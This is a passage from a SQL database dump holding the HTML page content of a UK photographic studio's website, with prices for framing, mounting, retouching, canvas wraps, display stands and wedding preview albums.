/>\r\n<br />\r\n All prices are subject to vat.<br />\r\n<img height=\"900\" width=\"544\" src=\"http://www.paulgrahamltd.com//EditorImages/image/PREMIUM_PRICES.jpg\" alt=\"\" />','','','','','','','','','Y','2012-01-19 13:44:54','2010-05-25 12:04:44',87),(88,'Layout1','6','Mounting','mounting.php','Mounting','Mounting','Mounting','<br />\r\n Our mounting service is highly professional and can be tailored to <br />\r\n suit every requirement. We have invested not only in purpose built <br />\r\n equipment but also in precision and care which goes into the <br />\r\n final product. <br />\r\n<br />\r\n This table represents our most popular materials and laminates. <br />\r\n However, should you require something different, please contact us <br />\r\n and we will be happy to discuss your exact requirements.<br />\r\n<br />\r\n All prices Subject to vat.\r\n<p align=\"left\"><img height=\"900\" width=\"544\" src=\"http://www.paulgrahamltd.com//EditorImages/image/MOUNTING_PRICES.jpg\" alt=\"\" /></p>','','','','','','','','','Y','2012-01-19 13:45:04','2010-05-25 12:07:52',88),(89,'Layout1','6','Small Print Service','small-print-service.php','Small Print Service','Small Print Service','Small Print Service','<p><br />\r\n<img height=\"149\" width=\"544\" src=\"http://www.paulgrahamltd.com//EditorImages/image/13p_PRINTS_PRICES.jpg\" alt=\"\" /><br />\r\n All prices are subject to vat.</p>','','','','','','','','','Y','2012-01-19 13:45:13','2010-05-25 12:22:40',89),(90,'Layout2','5','Digital Restoration','img-enhan-digital-resto.php','Digital Restoration','Digital Restoration','Digital Restoration','','PROD_90.jpg','','Digital <span class=\\\'pinksmalltitle\\\'> Restoration</span>','<br />\r\n<font face=\"Verdana\">An image says a thousand words and can hold cherished memories of loved ones, sentimental places, historical artifacts or that special something that matters to you only.<br />\r\n<br />\r\nOur digital artists provide the highest quality digital retouching and artwork to complement your images, having the knowledge and ability to advise you on how to bring that special moment back to life.<br />\r\n<br />\r\nRetouched images will be printed directly onto photographic paper or saved to CD. </font>','Level of <span class=\\\'pinksmalltitle\\\'> Work</span>','<br />\r\n<font face=\"Verdana\">All Re-Touching work is done to 3 set structured levels 1-3. Below is information on how each level is broken down and priced<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Retouch level 1 £ 20+vat</font></strong><br />\r\nSimple retouch work including removing spots, small marks from background, tidying stray hair.<br />\r\n<br />\r\n</font><font face=\"Verdana\"><strong><font color=\"#ec008c\">Retouch level 2 £ 30+vat<br />\r\n</font></strong>More complex digital work including wrinkle removal, eye opening, extending backgrounds.<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Retouch level 3 £ 50+vat <font size=\"1\">(Starting Price)</font></font></strong><br />\r\nComplex retouching including combining multiple images, complicated background changes.</font>','','','Y','2010-05-25 14:13:11','2010-05-25 13:06:26',90),(91,'Layout2','5','Spot Colour','img-enhan-spot-col.php','Spot Colour','Spot Colour','Spot Colour','','PROD_91.jpg','','Spot <span class=\'pinksmalltitle\'> Colour</span>','<br />\r\n<p>Utilising specialist software and technique we offer the spot colour style. Using a combination of classical black and white combined with an accent of colour. You choose the image and let us know which area of colour you would like isolating and we combine our traditional and digital skill and create the desired effect.<br />\r\n<br />\r\nEnhanced images will be printed directly onto photographic paper or saved to CD.</p>','<span class=\'pinksmalltitle\'> Price</span>','<br />\r\n<p>Price from<font color=\"#ec008c\"><strong> £10+vat</strong> </font><font color=\"#000000\">for a single spot colour.</font><br />\r\n<br />\r\nThe price includes all the digital alterations, but does not include any further digital re-touching. Any further work required will be done so on request when a price has been agreed.</p>','','','Y','2010-05-25 14:13:03','2010-05-25 13:09:53',91),(92,'Layout2','5','Pop-Art','img-enhan-pop-art.php','Pop-Art','Pop-Art','Pop-Art','','PROD_92.jpg','','Pop <span class=\'pinksmalltitle\'> Art</span>','<br />\r\n<p>Heralding from the fantastic 50\'s vibrant art movement we take your snaps and inject life into them with the use of overlaid vibrant contrasting colours. This is a highly modern and striking style which gives your images the real wow factor.<br />\r\n<br />\r\nEnhanced images will be printed directly onto photographic paper or saved to CD.</p>','<span class=\'pinksmalltitle\'> Price</span>','<p><font color=\"#ec008c\"><font color=\"#000000\"><br />\r\nPrice from</font><strong> £15.00+vat</strong> <font color=\"#000000\">for each colour overlaid image<br />\r\n</font></font><font color=\"#000000\"><br />\r\nThe price includes all the digital alterations, but does not include any further digital re-touching. Any further work required will be done so on request when a price has been agreed.</font></p>','','','Y','2010-05-25 14:12:53','2010-05-25 13:11:58',92),(93,'Layout2','2','Noir Double','framing-noir-double.php','Noir Double','Noir Double','Noir Double','','PROD_93.jpg','','The <span class=\'pinksmalltitle\'> Noir Double</span>','<br />\r\nAn Ultra Modern high gloss framing solution, the Noir bevelled edge glass frame gives a highly elegant overall presentation. The high gloss black glass gives the effect that the images have been printed into the glass which is an extremely modern and tasteful look.<br />\r\n<br />\r\nBecause these frames are clip released backed, changing the images is extremely simple. The frame can stand in either landscape or portrait position.','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><br />\r\n<font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"80\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Image</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\"> x2 7x5 Prints</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 18+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','','','Y','2010-08-31 11:24:02','2010-05-26 08:10:41',25),(94,'Layout2','2','Noir Triple','framing-noir-trip.php','Noir Triple','Noir Triple','Noir Triple','','PROD_94.jpg','','The <span class=\'pinksmalltitle\'> Noir Triple</span>','<br />\r\nAn Ultra Modern high gloss framing solution, the Noir bevelled edge glass frame gives a highly elegant overall presentation. The high gloss black glass gives the effect that the images have been printed into the glass which is an extremely modern and tasteful look.<br />\r\n<br />\r\nBecause these frames are clip released backed, changing the images is extremely simple. The frame can stand in either landscape or portrait position.','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<br />\r\n<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"80\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Image</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">x3 6x4 Prints</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 18+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','','','Y','2010-08-31 11:24:29','2010-05-26 08:15:45',26),(96,'Layout2','2','Baroque','framing-baroque.php','Baroque','Baroque','Baroque','','PROD_96.jpg','Baroque','The <span class=\'pinksmalltitle\'> Baroque</span>','<br />\r\nA modern take on the traditional swept frame. These frames are the ideal accompaniment for both contemporary and traditional decors. Elegant and grandiose, the Baroque frame has a luxurious border finished with either a white or black powder coating.<br />\r\n<br />\r\nThis frame is ideal for any customer who requires a framing solution with a more outlandish visual presence.<br />\r\n<br />\r\nThis frame is also available with a \'traditional\' glass and mount frontage presentation. For this it is an added<br />\r\n10% on top of the list price. ','Size & <span class=\'pinksmalltitle\'> Prices</span>','<br />\r\n<font size=\"1\">(All measurements are in inches)</font><br />\r\n<table style=\"width: 173px; height: 100px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"100\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n Frame <font color=\"#ec008c\"><strong>Size</strong></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 20x24</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 110+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x30</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 120+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">36x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"172\" height=\"114\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Baroque_Mould.jpg\" />','Y','2011-03-29 12:35:03','2010-05-26 09:03:51',95),(97,'Layout2','8','Twist Module','disp-sys-twist-module.php','Twist Module','Twist Module','Twist Module','','PROD_97.jpg','','The <span class=\'pinksmalltitle\'> Twist Module</span>','<br />\r\nExtremely stable and simple to erect, the Original Twist banner is the basis for the Twist range. Complete with an integrated low voltage light and transformer, the Twist also has the ability to be single or double sided as standard, i.e. graphics on the front and back.','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<font size=\"2\"><br />\r\nModule as shown in visual comprising of:<br />\r\n<br />\r\nx1 Original Twist - <font size=\"1\">700-800 w x2000mm</font><br />\r\nx1 Flexi Link -<font size=\"1\"> 550x2000mm</font><br />\r\nx1 Media Twist - <font size=\"1\">700-800x2000mm</font><br />\r\nx1 Hard Case Unit<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Price £880+vat.<br />\r\n<br />\r\n</strong></font><font color=\"#000000\" size=\"1\">As the Twist unit has a wide variety of hieght and width possibilities we have priced this twist module on what we consider to be standard sizes both height and width. For further price and module variations please contact the studio on (01254) 681001 as these will be priced on request. Please note with the media twist we DO NOT supply the screen.</font></font>','','','Y','2011-11-05 16:24:00','2010-05-26 10:47:21',48),(98,'Layout2','8','Link Module','disp-sys-link-module.php','Link Module','Link Module','Link Module','','PROD_98.jpg','','The <span class=\'pinksmalltitle\'> Link Module</span>','<br />\r\nThe Link is a wonderfully crafted, lightweight and versatile roller system. A brand new concept in visual display graphics, this unit has the functionality to be magnetically linked to another unit evolving into 2, 3 or as many units as you need so as your message or business grows the link can grow with it. ','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nComprising of:<br />\r\n<br />\r\nx3 Link Banners 850x2000mm<br />\r\nx2 Magnetic Links<br />\r\n<br />\r\n<strong><font color=\"#ec008c\" size=\"2\">Price £629+vat.</font></strong></p>','','','Y','2010-05-26 11:55:47','2010-05-26 10:54:25',97),(99,'Layout1','21','What is \'Your\' Fusion','what-is-fusion.php','What is \'Your\' Fusion','What is \'Your\' Fusion','What is \'Your\' Fusion','<p><font size=\"3\"><font size=\"2\">Designed and created in -house, specifically for use with photographic <br />\r\nimages,</font> \'<strong>Your <font color=\"#ec008c\">Fusion</font></strong>\' <font size=\"2\">is our new and exciting cutting edge <br />\r\nphotographic service which enables you to give your images a fresh, <br />\r\nclean and modern take on conventional photographic presentation.</font><br />\r\n<br />\r\n</font><font size=\"2\">Each style has been custom designed and each of the examples shown <br />\r\ncan be adjusted proportionately along with the option of being colour <br />\r\nmatched to perfectly complement the subject matter.</font></p>\r\n<p><font size=\"3\"> </font></p>','','','','','','','','','Y','2010-06-01 13:45:11','2010-05-28 09:26:01',99),(100,'Layout1','21','Style 1','fusion-style-1.php','Style 1','Style 1','Style 1','<p><br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Rustic_Frame_Back.jpg\" /></p>','','','','','','','','','Y','2010-06-04 13:54:17','2010-05-28 09:36:47',100),(101,'Layout1','21','Style 2','fusion-style-2.php','Style 2','Style 2','Style 2','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Blue_Scratches.jpg\" />','','','','','','','','','Y','2010-06-04 13:56:39','2010-05-28 09:40:47',101),(102,'Layout1','21','Style 3','fusiom-style-3.php','Style 3','Style 3','Style 3','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Pogo.jpg\" />','','','','','','','','','Y','2010-06-04 13:58:19','2010-05-28 09:41:58',102),(103,'Layout1','21','Style 4','fusion-style-4.php','Style 4','Style 4','Style 4','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Sketch_Floral_Pink.jpg\" />','','','','','','','','','Y','2010-06-04 13:59:17','2010-05-28 09:43:15',103),(104,'Layout1','21','Style 5','fusion-style-5.php','Style 5','Style 5','Style 5','<br />\r\n<img alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Blue_Family.jpg\" />','','','','','','','','','Y','2010-06-04 13:59:48','2010-05-28 09:47:03',104),(105,'Layout1','21','Style 6','fusion-style-6.php','Style 6','Style 6','Style 6','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Dreamy_Vector.jpg\" />','','','','','','','','','Y','2010-06-04 14:00:13','2010-05-28 09:49:33',105),(106,'Layout1','21','Style 7','fusion-style-7.php','Style 7','Style 7','Style 7','<br />\r\n<img alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Ballett.jpg\" />','','','','','','','','','Y','2010-06-04 14:00:38','2010-05-28 09:52:03',106),(107,'Layout1','21','Style 8','fusion-style-8.php','Style 8','Style 8','Style 8','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Swept_Frame.jpg\" />','','','','','','','','','Y','2010-06-04 14:01:00','2010-05-28 09:54:19',107),(108,'Layout1','21','Style 9','fusion-style-9.php','Style 9','Style 9','Style 9','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Baby.jpg\" />','','','','','','','','','Y','2010-06-04 14:01:25','2010-05-28 09:55:50',108),(109,'Layout1','21','Style 10','fusion-style-10.php','Style 10','Style 10','Style 10','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_K_Family_1.jpg\" />','','','','','','','','','Y','2010-06-04 14:01:43','2010-05-28 09:57:22',109),(110,'Layout1','21','Style 11','fusion-style-11.php','Style 11','Style 11','Style 11','<br />\r\n<img alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Sketch_Floral_Dark.jpg\" />','','','','','','','','','Y','2010-06-04 14:02:01','2010-05-28 09:58:18',110),(111,'Layout1','21','Style 12','fusion-style-12.php','Style 12','Style 12','Style 12','<br />\r\n<img height=\"1162\" width=\"740\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Your_Fusion_Purple_Swirls.jpg\" />','','','','','','','','','Y','2010-06-04 14:02:20','2010-05-28 09:59:07',111),(112,'Layout2','2','Noir Single','framing-noir-single.php','Noir Single','Noir Single','Noir Single','','PROD_112.jpg','','The <span class=\'pinksmalltitle\'> Noir Single</span>','<br />\r\nAn Ultra Modern high gloss framing solution, the Noir bevelled edge glass frame gives a highly elegant overall presentation. The high gloss black glass gives the effect that the images have been printed into the glass which is an extremely modern and tasteful look.<br />\r\n<br />\r\nBecause these frames are clip released backed, changing the images is extremely simple. The frame can also stand in either landscape or portrait position.','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<br />\r\n<p><br />\r\n<font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"80\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Image</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">10x8</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 18+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','','','Y','2010-08-31 11:23:42','2010-05-28 13:02:03',24),(113,'Layout1','4','Makeover Package','studio-makeover.php','Makeover Package','Makeover Package','Makeover Package','<br />\r\n<img width=\"740\" height=\"1432\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/STUDIO_makeover(4).jpg\" />','','','','','','','','','Y','2010-06-16 12:10:52','2010-05-29 10:09:48',113),(114,'Layout1','1','Bespoke Commissions','acrylics-bespoke-coms.php','Bespoke Commissions','Bespoke Commissions','Bespoke Commissions','<span lang=\"EN-GB\">\r\n<p>We can also design and manufacture acrylic products <br />\r\nto your exact specification. Utilising our in-house design<br />\r\nknowledge and manufacturing technology we can create <br />\r\ntotally <font color=\"#ff00ff\"><font color=\"#ec008c\"><strong>\'one of a kind\'</strong></font> </font>bespoke acrylic presentations.<br />\r\n<br />\r\nFor further information please contact the studio via telephone<br />\r\non (01254) 681001 or via email</p>\r\n</span><a href=\"mailto:mail@paulgrahamltd.com\"><u><font color=\"#0000ff\"><span lang=\"EN-GB\">mail@paulgrahamltd.com</span></font></u></a><span lang=\"EN-GB\">.<br />\r\n<br />\r\nPlease see some of our examples below.</span><font size=\"2\"><br />\r\n<br />\r\n<hr />\r\n<br />\r\n<img alt=\"\" width=\"747\" height=\"503\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bespoke_Commission_5(1).jpg\" /><br />\r\n<br />\r\n<hr />\r\n<br />\r\n<img alt=\"\" width=\"747\" height=\"535\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bespoke_Commission_4(1).jpg\" /><br />\r\n<br />\r\n<hr />\r\n<br />\r\n<img alt=\"\" width=\"747\" height=\"478\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bespoke_Commission_3(1).jpg\" /><br />\r\n<br />\r\n<hr />\r\n<br />\r\n<img alt=\"\" width=\"747\" height=\"437\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bespoke_Commission_2(1).jpg\" /><br />\r\n<br />\r\n<hr />\r\n<br />\r\n<img alt=\"\" width=\"747\" height=\"578\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bespoke_Commission_1(1).jpg\" /></font>','','','','','','','','','N','2011-11-05 16:10:57','2010-05-29 12:22:50',114),(115,'Layout1','1','COLOURS','acrylics-colours-coms.php','Colours','Colours','Colours','<p><img alt=\"\" width=\"740\" height=\"115\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><br />\r\n<br />\r\n<img width=\"724\" height=\"1500\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/colours/colours with numbers(2).jpg\" /></p>','','','','','','','','','Y','2013-05-01 11:21:07','2010-06-02 09:38:25',142),(116,'Layout1','22','Prices','scanning-prices.php','Prices','Prices','Prices','<br />\r\n<img width=\"500\" height=\"600\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Scanning(1).jpg\" />','','','','','','','','','Y','2010-06-08 15:17:09','2010-06-08 14:08:10',116),(117,'Layout2','3','Ultimate Canvas Wrap','canvas-ultimate.php','Ultimate Canvas Wrap','Ultimate Canvas Wrap','Ultimate Canvas Wrap','','PROD_117.jpg','','The <span class=\'pinksmalltitle\'> Ultimate Canvas Wrap</span>','<br />\r\n<p><span lang=\"EN-GB\"><br />\r\nA wealth of expertise and precision has created the ultimate in canvas presentation. An opulent combination of our handstretched canvas and sleek linear frame moulding, delivering outstanding quality and style.</span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<br />\r\n<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"170\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>\r\n <p><br />\r\n <font size=\"2\">Price <br />\r\n </font><font color=\"#000000\" size=\"1\">(inc canvas)</font></p>\r\n </strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 150+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 160+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 165+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 175+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 185+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 200+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 200+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 220+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 240+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<p><br />\r\n<img alt=\"\" width=\"170\" height=\"143\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Ultimate_Mould.jpg\" /></p>','Y','2010-06-10 09:27:09','2010-06-08 14:45:15',117),(118,'Layout2','10','Preview: Black 12x12 With Aperture','wed-albums-preiview-12x12-ap.php','Preview: Black 12x12 With Aperture','Preview: Black 12x12 With Aperture','Preview: Black 12x12 With Aperture','','PROD_118.jpg','','<span class=\'pinksmalltitle\'> Black 12x12 With Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our 12x12" Preview book is available with or without front aperture and can hold a maximum of 35 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nBlack 12x12" Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : 8x8cm<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 35 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 12x12 inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£115+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£65+vat</font></strong></p>','','','Y','2010-07-03 13:39:49','2010-07-03 10:32:16',120),(119,'Layout2','10','Preview: Black 12x12 Without Aperture','wed-albums-preiview-12x12-no-ap.php','Preview: Black 12x12 Without Aperture','Preview: Black 12x12 Without Aperture','Preview: Black 12x12 Without Aperture','','PROD_119.jpg','','<span class=\'pinksmalltitle\'> Black 12x12 Without Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our 12x12" Preview book is available with or without front aperture and can hold a maximum of 35 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nBlack 12x12" Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : N/A<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 35 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 12x12 inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£115+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£65+vat</font></strong></p>','','','Y','2010-07-03 14:04:57','2010-07-03 10:39:40',121),(120,'Layout2','10','Preview: Black A4 With Aperture','wed-albums-preiview-BLACK-A4-ap.php','Preview: Black A4 With Aperture','Preview: Black A4 With Aperture','Preview: Black A4 With Aperture','','PROD_120.jpg','','<span class=\'pinksmalltitle\'> Black A4 With Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our A4 Preview book can be supplied either landscape or portrait and can hold a maximum of 45 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nBlack A4 Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : 8x8cm<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 45 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 8x11.5 Inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£85+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£38+vat</font></strong></p>','','','Y','2010-07-03 13:40:02','2010-07-03 10:53:17',84),(121,'Layout2','10','Preview: Black A4 Without Aperture','wed-albums-preiview-BLACK-A4-no-ap.php','Preview: Black A4 Without Aperture','Preview: Black A4 Without Aperture','Preview: Black A4 Without Aperture','','PROD_121.jpg','','<span class=\'pinksmalltitle\'> Black A4 Without Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our A4 Preview book can be supplied either landscape or portrait and can hold a maximum of 45 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nBlack A4 Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : N/A<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 45 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 8x11.5 Inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£85+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£38+vat</font></strong></p>','','','Y','2010-07-03 13:33:42','2010-07-03 10:55:42',85),(122,'Layout2','10','Preview: Silver A4 With Aperture','wed-albums-preiview-silver-A4-ap.php','Preview: Silver A4 With Aperture','Preview: Silver A4 With Aperture','Preview: Silver A4 With Aperture','','PROD_122.jpg','','<span class=\'pinksmalltitle\'> Silver A4 With Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our Silver A4 Preview book gives a highly modern feel with its matt silver finish and can be supplied either landscape or portrait and can hold a maximum of 45 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nSilver A4 Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : 8x8cm<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 45 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 8x11.5 Inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£110+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£55+vat</font></strong></p>','','','Y','2010-07-03 13:34:12','2010-07-03 11:37:45',118),(123,'Layout2','10','Preview: Silver A4 Without Aperture','wed-albums-preiview-silver-no-ap.php','Preview: Silver A4 Without Aperture','Preview: Silver A4 Without Aperture','Preview: Silver A4 Without Aperture','','PROD_123.jpg','','<span class=\'pinksmalltitle\'> Silver A4 Without Aperture</span>','<p><br />\r\nA Simple and effective presentation. Our Silver A4 Preview book gives a highly modern feel with its matt silver finish and can be supplied either landscape or portrait and can hold a maximum of 45 single sided photographic pages. An ideal solution for remembering that special day.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><strong><br />\r\nSilver A4 Preview Book,</strong></p>\r\n<p>Aperture <strong><font color=\"#ec008c\">Size</font></strong> : N/A<br />\r\nMaximum <strong><font color=\"#ec008c\">Pages</font></strong>: 45 <font size=\"1\">(Single Sided)<br />\r\n</font>Print <strong><font color=\"#ec008c\">Size</font></strong>: 8x11.5 Inches<br />\r\n<br />\r\n<strong>Price:<br />\r\n<br />\r\nDesign <font color=\"#ec008c\">£110+vat</font><br />\r\nNon-Design <font color=\"#ec008c\">£55+vat</font></strong></p>','','','Y','2010-07-03 13:34:44','2010-07-03 11:42:21',119),(124,'Layout1','1','FLUSH','flush1.php','Flush 1','Flush 1','Flush 1','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" 